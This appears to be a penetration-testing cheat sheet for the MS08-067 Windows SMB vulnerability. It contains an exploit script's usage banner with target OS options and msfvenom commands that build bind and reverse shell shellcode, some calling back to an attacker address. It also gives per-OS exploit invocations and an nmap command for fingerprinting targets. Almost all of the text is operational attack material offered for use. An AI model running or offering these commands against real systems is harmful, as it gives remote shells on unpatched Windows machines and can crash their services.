MS08-067

    print '   ____________________________________________'
    print '  |                                            |'
    print '  | MS08-067 Exploit - Auto NC mod by 3mrgnc3  |'
    print '  |    Based On Ported MSF Exploit By EKOZ     |'
    print '  |____________________________________________|'
    print '  |                                            |'
    print '  |                   USAGE                    |'
    print '  |  MS08-067.py <rhost> <os> <lhost> <lport>  |'
    print '  |   eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53   |'
    print '  |____________________________________________|'
    print '  |                                            |'
    print '  |            TARGET OS SELECTION             |'
    print '  |  1 = Windows XP SP0/SP1 Universal          |'
    print '  |  2 = Windows 2000 Universal                |'
    print '  |  3 = Windows 2003 SP0 Universal            |'
    print '  |  4 = Windows 2003 SP1 English              |'
    print '  |  5 = Windows XP SP3 French (NX)            |'
    print '  |  6 = Windows XP SP3 English (NX)           |'
    print '  |  7 = Windows XP SP3 English (AlwaysOn NX)  |'
    print '  |____________________________________________|'

Another awesome script on GitHub: https://github.com/andyacer/ms08_067

# Generate shellcode
msfvenom -p windows/shell_bind_tcp RHOST=192.168.1.1 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows   

# Usage: ms08_067_2018.py <target ip> <os #> <port #>

ms08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
ms08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
ms08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
ms08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
ms08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
ms08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
ms08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
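# The <os #> value has to match the host's actual Windows version and service pack; a mismatched
# target can crash the Server service instead. nmap's smb-os-discovery script reports the OS version: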
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1  
